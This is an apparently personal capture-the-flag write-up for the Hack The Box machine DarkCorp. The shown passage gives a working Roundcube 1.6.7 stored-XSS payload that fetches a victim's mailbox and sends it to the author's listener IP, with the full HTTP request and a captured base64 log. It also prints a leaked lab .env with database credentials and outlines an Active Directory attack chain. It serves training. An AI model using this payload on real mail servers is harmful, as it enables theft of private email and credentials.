Hackthebox: DarkCorp

Overview

DarkCorp is an insance-difficulty machine from Hack The Box with the following scenario: Recon -> Roundcube stored XSS (contact form) -> Mail exfiltration via XSS -> Capture password-reset tokens -> Password reset takeover -> SQL injection (pg_read_file) -> .env disclosure (DB creds, secrets) -> PKINIT / certificate auth to get TGT -> Recover machine nthash (WEB-01$) -> Kerberos ticket forging (ticketer.py) / pass-the-ticket -> Dump NTDS / SAM / LSA (secretsdump) -> PetitPotam / EfsRpc NTLM relay techniques -> GPO abuse (pyGPOAbuse) to create scheduled task -> Add local admin / escalate via GPO -> Remote code execution / shell via Evil-WinRM -> DPAPI / CredMan extraction (DonPAPI) -> Extracted plaintext Administrator credentials -> Privilege escalation to Administrator.

DarkCorp

Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_  256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.32 seconds

The box is declared as a windows machine, yet we have a linux machine nmap scan. That means that we have a linux machine that is domain joined to a domain controller.
We have port 80 open declaring a web application.
When we try to access it, we are redirected to http://mail.drip.htb/, so lets add that entry to our /etc/hosts file.

Roundcube

We have a roundcube instance which is basically an emailing solution with version: 1.6.7.
Doing some enumeration, we can also find this endpoint with .env data http://drip.darkcorp.htb/dashboard/.env :

# True for development, False for production
DEBUG=False

# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development

# If not provided, a random one is generated 
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>

# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets

# If DB credentials (if NOT provided, or wrong values SQLite is used) 
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = '[email protected]'

Now playing with the contact form under /contact, we can change the destination email to our email in the request and we will receive this:

Confidentiality Notice: This electronic communication may contain confidential or privileged information. Any unauthorized review, use, disclosure, copying, distribution, or taking of any part of this email is strictly prohibited.  
If you suspect that you've received a "phishing" e-mail, please forward the entire email to our security engineer at [[email protected]](mailto:[email protected])

Also with some googling we find that there is an XSS in roundcube v1.6.7 in contact form on bcase user.
This will be our payload:

name=kujen&[email protected]&message=<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch('/?_task=mail&_action=show&_uid=3&_mbox=INBOX&_extwin=1').then(r=>r.text()).then(t=>fetch(`http://10.10.16.20/c=${btoa(t)}`))  foo=bar">Foo</body>&content=html&[email protected]

And we change it into the request:

POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 440
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiN2RlMTc2YWJmYzA5NDc3NDZlYjExOGYzYWEyODJkYWVmZTE3YWM1NCJ9.Z65HuQ.PAgXqD2w-R0gz0_G3BuKM-Lon84
Connection: keep-alive

name=kujen&email=kujen&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation-name%3Aprogress-bar-stripes%20onanimationstart%3Dfetch%28%27%2F%3F_task%3Dmail%26_action%3Dshow%26_uid%3D3%26_mbox%3DINBOX%26_extwin%3D1%27%29.then%28r%3D%3Er.text%28%29%29.then%28t%3D%3Efetch%28%60http%3A%2F%2F10.10.16.20%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3EFoo%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb

We will receive this on our local http server:

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.161.63 - - [13/Feb/2025 20:22:41] code 404, message File not found
::ffff:10.129.161.63 - - [13/Feb/2025 20:22:41] "GET /c=PCFET0NUWVBFIGh0bWw+Cgo8aHRtbCBsYW5nPSJlbiI+Cgo8aGVhZD4KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiPjx0aXRsZT5EcmlwTWFpbCBXZWJtYWlsIDo6IEN1c3RvbWVyIEluZm9ybWF0aW9uIFJlcXVlc3Q8L3RpdGxlPgoJPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAsIHNocmluay10by1maXQ9bm8sIG1heGltdW0tc2NhbGU9MS4wIj48bWV0YSBuYW1lPSJ0aGVtZS1jb2xvciIgY29udGVudD0iI2Y0ZjRmNCI+PG1ldGEgbmFtZT0ibXNhcHBsaWNhdGlvbi1uYXZidXR0b24tY29sb3IiIGNvbnRlbnQ9IiNmNGY0ZjQiPgoJPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJza2lucy9lbGFzdGljL2ltYWdlcy9mYXZpY29uLmljbz9zPTE3MTYxMDcyMzciPgoJPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJza2lucy9lbGFzdGljL2RlcHMvYm9vdHN0cmFwLm1pbi5jc3M/cz0xNzE2MTA3MjQ1Ij4KCQoJCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic2tpbnMvZWxhc3RpYy9zdHlsZXMvc3R5bGVzLm1pbi5jc3M/cz0xNzE2MTA3MjM3Ij4KCQkKCQoJCgkJPHNjcmlwdD4KCQl0cnkgewoJCQlpZiAoZG9jdW1lbnQuY29va2llLmluZGV4T2YoJ2NvbG9yTW9kZT1kYXJrJykgPiAtMQoJCQkJfHwgKGRvY3VtZW50LmNvb2tpZS5pbmRleE9mKCdjb2xvck1vZGU9bGlnaHQnKSA9PT0gLTEgJiYgd2luZG93Lm1hdGNoTWVkaWEoJyhwcmVmZXJzLWNvbG9yLXNjaGVtZTogZGFyayknKS5tYXRjaGVzKQoJCQkpIHsKCQkJCWRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5jbGFzc05hbWUgKz0gJyBkYXJrLW1vZGUnOwoJCQl9CgkJfSBjYXRjaCAoZSkgeyB9CgkJPC9zY3JpcHQ+CgkKPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0icGx1Z2lucy9qcXVlcnl1aS90aGVtZXMvZWxhc3RpYy9qcXVlcnktdWkubWluLmNzcz9zPTE3MTYxMDcyMzciPjxzY3JpcHQgc3JjPSJwcm9ncmFtL2pzL2pxdWVyeS5taW4uanM/cz0xNzE2MTA3MjQyIj48L3NjcmlwdD48c2NyaXB0IHNyYz0icHJvZ3JhbS9qcy9jb21tb24ubWluLmpzP3M9MTcxNjEwNzIzNyI+PC9zY3JpcHQ+PHNjcmlwdCBzcmM9InByb2dyYW0vanMvYXBwLm1pbi5qcz9zPTE3MTYxMDcyMzciPjwvc2NyaXB0PjxzY3JpcHQ+Ci8qCiAgICAgICAgQGxpY3N0YXJ0ICBUaGUgZm9sbG93aW5nIGlzIHRoZSBlbnRpcmUgbGljZW5zZSBub3RpY2UgZm9yIHRoZSAKICAgICAgICBKYXZhU2NyaXB0IGNvZGUgaW4gdGhpcyBwYWdlLgoKICAgICAgICBDb3B5cmlnaHQgKEMpIFRoZSBSb3VuZGN1YmUgRGV2IFRlYW0KCiAgICAgICAgVGhlIEphdmFTY3JpcHQgY29kZSBpbiB0aGlzIHBhZ2UgaXMgZnJlZSBzb2Z0d2FyZTogeW91IGNhbiByZWRpc3RyaWJ1dGUKICAgICAgICBpdCBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSB0ZXJtcyBvZiB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UKICAgICAgICBhcyBwdWJsaXNoZWQgYnkgdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgZWl0aGVyIHZlcnNpb24gMyBvZgogICAgICAgIHRoZSBMaWNlbnNlLCBvciAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKICAgICAgICBUaGUgY29kZSBpcyBkaXN0cmlidXRlZCBXSVRIT1VUIEFOWSBXQVJSQU5UWTsgd2l0aG91dCBldmVuIHRoZSBpbXBsaWVkCiAgICAgICAgd2FycmFudHkgb2YgTUVSQ0hBTlRBQklMSVRZIG9yIEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUiBQVVJQT1NFLgogICAgICAgIFNlZSB0aGUgR05VIEdQTCBmb3IgbW9yZSBkZXRhaWxzLgoKICAgICAgICBAbGljZW5kICBUaGUgYWJvdmUgaXMgdGhlIGVudGlyZSBsaWNlbnNlIG5vdGljZQogICAgICAgIGZvciB0aGUgSmF2YVNjcmlwdCBjb2RlIGluIHRoaXMgcGFnZS4KKi8KdmFyIHJjbWFpbCA9IG5ldyByY3ViZV93ZWJtYWlsKCk7CnJjbWFpbC5zZXRfZW52KHsidGFzayI6Im1haWwiLCJzdGFuZGFyZF93aW5kb3dzIjpmYWxzZSwibG9jYWxlIjoiZW5fVVMiLCJkZXZlbF9tb2RlIjpudWxsLCJyY3ZlcnNpb24iOjEwNjA3LCJjb29raWVfZG9tYWluIjoiIiwiY29va2llX3BhdGgiOiIvIiwiY29va2llX3NlY3VyZSI6ZmFsc2UsImRhcmtfbW9kZV9zdXBwb3J0Ijp0cnVlLCJza2luIjoiZWxhc3RpYyIsImV4dHdpbiI6MSwiYmxhbmtwYWdlIjoic2tpbnMvZWxhc3RpYy93YXRlcm1hcmsuaHRtbCIsInJlZnJlc2hfaW50ZXJ2YWwiOjEwLCJzZXNzaW9uX2xpZmV0aW1lIjo2MDAsImFjdGlvbiI6InNob3ciLCJjb21tX3BhdGgiOiIvP190YXNrPW1haWwiLCJ1c2VyX2lkIjoidHdaTGdnZUJxb1hMVWZOSyIsImNvbXBvc2VfZXh0d2luIjpmYWxzZSwiZGF0ZV9mb3JtYXQiOiJ5eS1tbS1kZCIsImRhdGVfZm9ybWF0X2xvY2FsaXplZCI6IllZWVktTU0tREQiLCJicm93c2VyX2NhcGFiaWxpdGllcyI6eyJwZGYiOiIxIiwiZmxhc2giOiIwIiwidGlmZiI6IjAiLCJ3ZWJwIjoiMSIsInBncG1pbWUiOiIwIn0sInVpZCI6IjMiLCJzYWZlbW9kZSI6dHJ1ZSwibWVzc2FnZV9jb250ZXh0IjpudWxsLCJtZXNzYWdlX2ZsYWdzIjpbInNlZW4iXSwic2VuZGVyIjoia3VqZW4gXHUwMDNDa3VqZW5AZHJpcC5odGJcdTAwM0UiLCJtYWlsYm94IjoiSU5CT1giLCJ1c2VybmFtZSI6ImJjYXNlIiwicGVybWF1cmwiOiIvP190YXNrPW1haWwmX2FjdGlvbj1zaG93Jl91aWQ9MyZfbWJveD1JTkJPWCIsImhhc193cml0ZWFibGVfYWRkcmVzc2Jvb2siOnRydWUsImRlbGltaXRlciI6Ii4iLCJtaW1ldHlwZXMiOlsidGV4dC9wbGFpbiIsInRleHQvaHRtbCIsImltYWdlL2pwZWciLCJpbWFnZS9naWYiLCJpbWFnZS9wbmciLCJpbWFnZS9ibXAiLCJpbWFnZS90aWZmIiwiaW1hZ2Uvd2VicCIsImFwcGxpY2F0aW9uL3gtamF2YXNjcmlwdCIsImFwcGxpY2F0aW9uL3BkZiIsIm1lc3NhZ2UvcmZjODIyIl0sInJlYWRfd2hlbl9kZWxldGVkIjp0cnVlLCJkaXNwbGF5X25leHQiOnRydWUsIm9wdGlvbmFsX2Zvcm1hdCI6InRleHQiLCJtYWlsYm94ZXMiOnsiSU5CT1giOnsiaWQiOiJJTkJPWCIsIm5hbWUiOiJJbmJveCIsInZpcnR1YWwiOmZhbHNlLCJjbGFzcyI6ImluYm94In19LCJtYWlsYm94ZXNfbGlzdCI6WyJJTkJPWCJdLCJyZXF1ZXN0X3Rva2VuIjoiUXBkVDhKTVprSzBsNXMyM0c4S2tETmdPUWw3cDlDY2EifSk7CnJjbWFpbC5hZGRfbGFiZWwoeyJsb2FkaW5nIjoiTG9hZGluZy4uLiIsInNlcnZlcmVycm9yIjoiU2VydmVyIEVycm9yISIsImNvbm5lcnJvciI6IkNvbm5lY3Rpb24gRXJyb3IgKEZhaWxlZCB0byByZWFjaCB0aGUgc2VydmVyKSEiLCJyZXF1ZXN0dGltZWRvdXQiOiJSZXF1ZXN0IHRpbWVkIG91dCIsInJlZnJlc2hpbmciOiJSZWZyZXNoaW5nLi4uIiwid2luZG93b3BlbmVycm9yIjoiVGhlIHBvcHVwIHdpbmRvdyB3YXMgYmxvY2tlZCEiLCJ1cGxvYWRpbmdtYW55IjoiVXBsb2FkaW5nIGZpbGVzLi4uIiwidXBsb2FkaW5nIjoiVXBsb2FkaW5nIGZpbGUuLi4iLCJjbG9zZSI6IkNsb3NlIiwic2F2ZSI6IlNhdmUiLCJjYW5jZWwiOiJDYW5jZWwiLCJhbGVydHRpdGxlIjoiQXR0ZW50aW9uIiwiY29uZmlybWF0aW9udGl0bGUiOiJBcmUgeW91IHN1cmUuLi4iLCJkZWxldGUiOiJEZWxldGUiLCJjb250aW51ZSI6IkNvbnRpbnVlIiwib2siOiJPSyIsImNoZWNraW5nbWFpbCI6IkNoZWNraW5nIGZvciBuZXcgbWVzc2FnZXMuLi4iLCJkZWxldGVtZXNzYWdlIjoiRGVsZXRlIG1lc3NhZ2UiLCJtb3ZlbWVzc2FnZXRvdHJhc2giOiJNb3ZlIG1lc3NhZ2UgdG8gdHJhc2giLCJtb3ZpbmdtZXNzYWdlIjoiTW92aW5nIG1lc3NhZ2UocykuLi4iLCJkZWxldGluZ21lc3NhZ2UiOiJEZWxldGluZyBtZXNzYWdlKHMpLi4uIiwibWFya2luZ21lc3NhZ2UiOiJNYXJraW5nIG1lc3NhZ2UocykuLi4iLCJyZXBseWFsbCI6IlJlcGx5IGFsbCIsInJlcGx5bGlzdCI6IlJlcGx5IGxpc3QiLCJib3VuY2UiOiJSZXNlbmQiLCJib3VuY2Vtc2ciOiJSZXNlbmQgKGJvdW5jZSkiLCJzZW5kaW5nbWVzc2FnZSI6IlNlbmRpbmcgbWVzc2FnZS4uLiIsImJhY2siOiJCYWNrIiwiZXJyb3J0aXRsZSI6IkFuIGVycm9yIG9jY3VycmVkISIsIm9wdGlvbnMiOiJPcHRpb25zIiwicGxhaW50b2dnbGUiOiJQbGFpbiB0ZXh0IiwiaHRtbHRvZ2dsZSI6IkhUTUwiLCJwcmV2aW91cyI6IlByZXZpb3VzIiwibmV4dCI6Ik5leHQiLCJzZWxlY3QiOiJTZWxlY3QiLCJicm93c2UiOiJCcm93c2UiLCJjaG9vc2VmaWxlIjoiQ2hvb3NlIGZpbGUuLi4iLCJjaG9vc2VmaWxlcyI6IkNob29zZSBmaWxlcy4uLiIsInB1cmdlZm9sZGVyY29uZmlybSI6IkRvIHlvdSByZWFsbHkgd2FudCB0byBkZWxldGUgYWxsIG1lc3NhZ2VzIGluIHRoaXMgZm9sZGVyPyIsImRlbGV0ZW1lc3NhZ2VzY29uZmlybSI6IkRvIHlvdSByZWFsbHkgd2FudCB0byBkZWxldGUgc2VsZWN0ZWQgbWVzc2FnZShzKT8iLCJ2aWV3c291cmNlIjoiU2hvdyBzb3VyY2UiLCJkZXRhaWxzIjoiRGV0YWlscyIsInN1bW1hcnkiOiJTdW1tYXJ5IiwiYXJpYWxhYmVsbWVzc2FnZWhlYWRlcnMiOiJNZXNzYWdlIGhlYWRlcnMifSk7CnJjbWFpbC5ndWlfY29udGFpbmVyKCJ0b29sYmFyIiwibWFpbHRvb2xiYXIiKTsKcmNtYWlsLmd1aV9jb250YWluZXIoImZvcndhcmRtZW51IiwiZm9yd2FyZC1tZW51Iik7CnJjbWFpbC5ndWlfY29udGFpbmVyKCJyZXBseWFsbG1lbnUiLCJyZXBseWFsbC1tZW51Iik7CnJjbWFpbC5ndWlfY29udGFpbmVyKCJtZXNzYWdlbWVudSIsIm1lc3NhZ2UtbWVudSIpOwpyY21haWwuZ3VpX2NvbnRhaW5lcigibWFya21lbnUiLCJtYXJrbWVzc2FnZS1tZW51Iik7CnJjbWFpbC5ndWlfY29udGFpbmVyKCJoZWFkZXJsaW5rcyIsImhlYWRlci1saW5rcyIpOwpyY21haWwuZ3VpX2NvbnRhaW5lcigiYXR0YWNobWVudG1lbnUiLCJhdHRhY2htZW50bWVudSIpOwpyY21haWwuZ3VpX2NvbnRhaW5lcigibWFpbHRvbWVudSIsIm1haWx0by1tZW51Iik7cmNtYWlsLnJlZ2lzdGVyX2J1dHRvbignY29tcG9zZScsICdyY21idG4xMDAnLCAnbGluaycsICcnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdyZXBseScsICdyY21idG4xMDEnLCAnbGluaycsICdyZXBseScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ3JlcGx5LWFsbCcsICdyY21idG4xMDInLCAnbGluaycsICdyZXBseS1hbGwnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdmb3J3YXJkJywgJ3JjbWJ0bjEwMycsICdsaW5rJywgJ2ZvcndhcmQnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdkZWxldGUnLCAncmNtYnRuMTA0JywgJ2xpbmsnLCAnZGVsZXRlJywgJycsICcnKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbigncHJpbnQnLCAncmNtYnRuMTA1JywgJ2xpbmsnLCAncHJpbnQnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdwcmV2aW91c21lc3NhZ2UnLCAncmNtYnRuMTA2JywgJ2xpbmsnLCAncHJldicsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ25leHRtZXNzYWdlJywgJ3JjbWJ0bjEwNycsICdsaW5rJywgJ25leHQnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdmb3J3YXJkLWlubGluZScsICdyY21idG4xMDgnLCAnbGluaycsICdmb3J3YXJkIGlubGluZSBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdmb3J3YXJkLWF0dGFjaG1lbnQnLCAncmNtYnRuMTA5JywgJ2xpbmsnLCAnZm9yd2FyZCBhdHRhY2htZW50IGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ2JvdW5jZScsICdyY21idG4xMTAnLCAnbGluaycsICdmb3J3YXJkIGJvdW5jZSBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdyZXBseS1hbGwnLCAncmNtYnRuMTExJywgJ2xpbmsnLCAncmVwbHkgYWxsIGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ3JlcGx5LWxpc3QnLCAncmNtYnRuMTEyJywgJ2xpbmsnLCAncmVwbHkgbGlzdCBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdwcmludCcsICdyY21idG4xMTMnLCAnbGluaycsICdwcmludCBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdkb3dubG9hZCcsICdyY21idG4xMTQnLCAnbGluaycsICdkb3dubG9hZCBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdlZGl0JywgJ3JjbWJ0bjExNScsICdsaW5rJywgJ2VkaXQgYXNuZXcgYWN0aXZlJywgJycsICcnKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbigndmlld3NvdXJjZScsICdyY21idG4xMTYnLCAnbGluaycsICdzb3VyY2UgYWN0aXZlJywgJycsICcnKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbignbW92ZScsICdyY21idG4xMTcnLCAnbGluaycsICdtb3ZlIGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ2NvcHknLCAncmNtYnRuMTE4JywgJ2xpbmsnLCAnY29weSBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdvcGVuJywgJ3JjbWJ0bjExOScsICdsaW5rJywgJ2V4dHdpbiBhY3RpdmUnLCAnJywgJycpOwpyY21haWwucmVnaXN0ZXJfYnV0dG9uKCdtYXJrJywgJ3JjbWJ0bjEyMCcsICdsaW5rJywgJ3JlYWQgYWN0aXZlJywgJycsICcnKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbignbWFyaycsICdyY21idG4xMjEnLCAnbGluaycsICd1bnJlYWQgYWN0aXZlJywgJycsICcnKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbignbWFyaycsICdyY21idG4xMjInLCAnbGluaycsICdmbGFnIGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ21hcmsnLCAncmNtYnRuMTIzJywgJ2xpbmsnLCAndW5mbGFnIGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ2NoYW5nZS1mb3JtYXQnLCAncmNtYnRuMTI0JywgJ2xpbmsnLCAnJywgJycsICcnKTsKcmNtYWlsLmd1aV9vYmplY3QoJ3JlbW90ZW9iamVjdHNtc2cnLCAncmVtb3RlLW9iamVjdHMtbWVzc2FnZScpOwpyY21haWwuZ3VpX29iamVjdCgnbWVzc2FnZWJvZHknLCAnbWVzc2FnZWJvZHknKTsKcmNtYWlsLnJlZ2lzdGVyX2J1dHRvbignb3Blbi1hdHRhY2htZW50JywgJ2F0dGFjaG1lbnVvcGVuJywgJ2xpbmsnLCAnZXh0d2luIGFjdGl2ZScsICcnLCAnJyk7CnJjbWFpbC5yZWdpc3Rlcl9idXR0b24oJ2Rvd25sb2FkLWF0dGFjaG1lbnQnLCAnYXR0YWNobWVudWRvd25sb2FkJywgJ2xpbmsnLCAnZG93bmxvYWQgYWN0aXZlJywgJycsICcnKTsKcmNtYWlsLmd1aV9vYmplY3QoJ21lc3NhZ2UnLCAnbWVzc2FnZXN0YWNrJyk7Cjwvc2NyaXB0PgoKPHNjcmlwdCBzcmM9InBsdWdpbnMvanF1ZXJ5dWkvanMvanF1ZXJ5LXVpLm1pbi5qcz9zPTE3MTYxMDcyMzciPjwvc2NyaXB0Pgo8L2hlYWQ+Cjxib2R5IGNsYXNzPSJ0YXNrLW1haWwgYWN0aW9uLXNob3ciPgoJCgkJPGRpdiBpZD0ibGF5b3V0Ij4KCQoKCgoKCjxoMSBjbGFzcz0idm9pY2UiPk1lc3NhZ2UgcHJldmlldzwvaDE+Cgo8ZGl2IGlkPSJsYXlvdXQtY29udGVudCIgY2xhc3M9InNlbGVjdGVkIj4KCQoJCTxoMiBpZD0iYXJpYS1sYWJlbC10b29sYmFyIiBjbGFzcz0idm9pY2UiPkFwcGxpY2F0aW9uIHRvb2xiYXI8L2gyPgoJCTxkaXYgY2xhc3M9ImhlYWRlciIgcm9sZT0idG9vbGJhciIgYXJpYS1sYWJlbGxlZGJ5PSJhcmlhLWxhYmVsLXRvb2xiYXIiPgoJCQk8YSBjbGFzcz0iYnV0dG9uIGljb24gYmFjay1saXN0LWJ1dHRvbiIgaHJlZj0iI2JhY2siPjxzcGFuIGNsYXNzPSJpbm5lciI+QmFjazwvc3Bhbj48L2E+CgkJCTxzcGFuIGNsYXNzPSJoZWFkZXItdGl0bGUiPjwvc3Bhbj4KCQkJCjxkaXYgaWQ9Im1haWx0b29sYmFyIiBjbGFzcz0idG9vbGJhciBtZW51IiByb2xlPSJ0b29sYmFyIj4KCTxhIGNsYXNzPSJjb21wb3NlIGhpZGRlbiIgdGl0bGU9IkNyZWF0ZSBhIG5ldyBtZXNzYWdlIiBpZD0icmNtYnRuMTAwIiByb2xlPSJidXR0b24iIGhyZWY9Ii8/X3Rhc2s9bWFpbCZhbXA7X2FjdGlvbj1jb21wb3NlIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ2NvbXBvc2UnLCcnLHRoaXMsZXZlbnQpIj48c3BhbiBjbGFzcz0iaW5uZXIiPkNvbXBvc2U8L3NwYW4+PC9hPgoJPGEgY2xhc3M9InJlcGx5IGRpc2FibGVkIiB0aXRsZT0iUmVwbHkgdG8gc2VuZGVyIiBkYXRhLWNvbnRlbnQtYnV0dG9uPSJ0cnVlIiBpZD0icmNtYnRuMTAxIiByb2xlPSJidXR0b24iIHRhYmluZGV4PSItMSIgYXJpYS1kaXNhYmxlZD0idHJ1ZSIgaHJlZj0iIyIgb25jbGljaz0icmV0dXJuIHJjbWFpbC5jb21tYW5kKCdyZXBseScsJycsdGhpcyxldmVudCkiPjxzcGFuIGNsYXNzPSJpbm5lciI+UmVwbHk8L3NwYW4+PC9hPgoJPHNwYW4gY2xhc3M9ImRyb3BidXR0b24iPgoJCTxhIGNsYXNzPSJyZXBseS1hbGwgZGlzYWJsZWQiIHRpdGxlPSJSZXBseSB0byBsaXN0IG9yIHRvIHNlbmRlciBhbmQgYWxsIHJlY2lwaWVudHMiIGlkPSJyY21idG4xMDIiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ3JlcGx5LWFsbCcsJycsdGhpcyxldmVudCkiPjxzcGFuIGNsYXNzPSJpbm5lciI+UmVwbHkgYWxsPC9zcGFuPjwvYT4KCQk8YSBocmVmPSIjcmVwbHktYWxsIiBpZD0icmVwbHlhbGxtZW51bGluayIgY2xhc3M9ImRyb3Bkb3duIiBkYXRhLXBvcHVwPSJyZXBseWFsbC1tZW51IiB0YWJpbmRleD0iMCI+CgkJCTxzcGFuIGNsYXNzPSJpbm5lciI+UmVwbHktYWxsIG9wdGlvbnM8L3NwYW4+CgkJPC9hPgoJPC9zcGFuPgoJPHNwYW4gY2xhc3M9ImRyb3BidXR0b24iPgoJCTxhIGNsYXNzPSJmb3J3YXJkIGRpc2FibGVkIiB0aXRsZT0iRm9yd2FyZCB0aGUgbWVzc2FnZSIgaWQ9InJjbWJ0bjEwMyIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnZm9yd2FyZCcsJycsdGhpcyxldmVudCkiPjxzcGFuIGNsYXNzPSJpbm5lciI+Rm9yd2FyZDwvc3Bhbj48L2E+CgkJPGEgaHJlZj0iI2ZvcndhcmQiIGlkPSJmb3J3YXJkbWVudWxpbmsiIGNsYXNzPSJkcm9wZG93biIgZGF0YS1wb3B1cD0iZm9yd2FyZC1tZW51IiB0YWJpbmRleD0iMCI+CgkJCTxzcGFuIGNsYXNzPSJpbm5lciI+Rm9yd2FyZGluZyBvcHRpb25zPC9zcGFuPgoJCTwvYT4KCTwvc3Bhbj4KCTxzcGFuIGNsYXNzPSJzcGFjZXIiPjwvc3Bhbj4KCTxhIGNsYXNzPSJkZWxldGUgZGlzYWJsZWQiIHRpdGxlPSJEZWxldGUgbWVzc2FnZSIgaWQ9InJjbWJ0bjEwNCIgcm9sZT0iYnV0dG9uIiB0YWJpbmRleD0iLTEiIGFyaWEtZGlzYWJsZWQ9InRydWUiIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiByY21haWwuY29tbWFuZCgnZGVsZXRlJywnJyx0aGlzLGV2ZW50KSI+PHNwYW4gY2xhc3M9ImlubmVyIj5EZWxldGU8L3NwYW4+PC9hPgoJCgkJPGEgY2xhc3M9InByaW50IGRpc2FibGVkIiB0aXRsZT0iUHJpbnQgdGhpcyBtZXNzYWdlIiBkYXRhLWhpZGRlbj0ic21hbGwiIGlkPSJyY21idG4xMDUiIHJvbGU9ImJ1dHRvbiIgdGFiaW5kZXg9Ii0xIiBhcmlhLWRpc2FibGVkPSJ0cnVlIiBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gcmNtYWlsLmNvbW1hbmQoJ3ByaW50JywnJyx0aGl